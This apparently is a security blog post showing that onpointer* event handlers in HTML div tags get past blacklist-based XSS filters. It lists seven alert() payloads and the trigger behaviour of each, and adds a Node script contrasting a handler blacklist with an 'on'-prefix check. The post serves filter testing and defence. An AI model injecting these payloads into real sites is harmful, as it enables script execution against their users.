onpoint* XSS payloads for bypassing blacklist-based event-handler XSS filters

Hi hackers. I crafted XSS payloads that bypass event-handler protection. It is just simple code.

onpointer* is a family of event handlers for pointing devices (such as tablets). They behave much like onmouse*, and they can be used to bypass XSS protections.

There is a family of event handlers starting with onpoint*, which behave similarly to onmouse*; while testing I found that XSS is possible through them, so I am writing this up as a blog post. (Reading only the TL;DR is fine.)

<div onpointerover="alert(45)">this is onpointerover=alert(45)</div>

TL;DR (XSS Payloads)

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

What is onpointer*?

onpointer* is the event-handler family for pointing devices.

https://www.w3.org/TR/pointerevents/

Originally I understood these as handlers for pointing tools such as a mouse (this is a bit ambiguous..). In any case, a pointing device can be treated much like a mouse, so the way they are triggered is almost the same. They are handlers that receive pointer events such as when the pointer is over an element, passes over it, moves, and so on. See the link above for details.

Pointer event handlers

  • onpointercancel
  • onpointerdown
  • onpointerenter
  • onpointerleave
  • onpointermove
  • onpointerout
  • onpointerover
  • onpointerup
  • gotpointercapture
  • lostpointercapture

onpointer* testing for XSS

Which mouse action fires each handler in testing:

  • onpointerover => fires on mouseover
  • onpointerdown => fires on click
  • onpointerenter => fires on mouseover
  • onpointerleave => fires on mouseleave
  • onpointermove => fires on mouseleave
  • onpointerout => fires on mouseover
  • onpointerup => fires on mouseover

Valid payloads

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

Conclusion

Blacklist filtering built from the usual reference lists (the OWASP cheat sheet, PayloadsAllTheThings) can be bypassed, because those documents do not include these handlers.
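As an added illustration (my own example, not code from this post), the Node script below contrasts a handler blacklist of the kind built from such reference lists with a rule that keys on the `on` attribute-name prefix. The blacklist contents and the sample tags are constructed, and the attribute matching is deliberately simplified; it is a check, not a full HTML sanitizer.

```javascript
// Added example (not from the original post): a blacklist of well-known
// handler names misses onpointer*, while a rule on the attribute-name
// prefix does not. Plain string handling so it runs under Node without a
// DOM; a real sanitizer must use an HTML parser, not regexes.

// Constructed blacklist of the familiar mouse/load handlers.
const BLACKLISTED_HANDLERS = new Set([
  "onclick", "onmouseover", "onmouseout", "onmouseenter", "onmouseleave",
  "onmousemove", "onmousedown", "onmouseup", "onload", "onerror",
]);

// One attribute inside a start tag: a name and an optional quoted or bare value.
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>`]+))?/g;

// Lower-cased attribute names of a single start tag such as
// '<div onpointerover="alert(45)">'.
function attributeNames(tag) {
  const inner = tag.replace(/^<\s*[^\s>\/]+/, "").replace(/\/?>\s*$/, "");
  const names = [];
  for (const m of inner.matchAll(ATTR_RE)) names.push(m[1].toLowerCase());
  return names;
}

// Blacklist check: only handlers present on the list are flagged.
function blockedByBlacklist(tag) {
  return attributeNames(tag).some((n) => BLACKLISTED_HANDLERS.has(n));
}

// Prefix rule: every inline event-handler attribute begins with "on", so
// onpointer* (and ongotpointercapture etc.) are caught without any list.
function hasInlineHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith("on"));
}

// Tags carrying a handler that the blacklist would let through.
function missedByBlacklist(tags) {
  return tags.filter((t) => hasInlineHandler(t) && !blockedByBlacklist(t));
}

// Constructed samples: the post's onpointer* payloads beside a classic one.
const SAMPLES = [
  '<div onmouseover="alert(45)">',
  '<div onpointerover="alert(45)">',
  '<div OnPointerDown = "alert(45)">',
  '<div ongotpointercapture=alert(45)>',
  '<div class="safe">',
];

console.log("missed by blacklist:", missedByBlacklist(SAMPLES)); // three tags
```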

Since HTML5, there are really many different event handlers and tags. A lot of testing is needed.

It's a simple trick, but I hope it helps! Happy bug hunting and security engineering.

Reference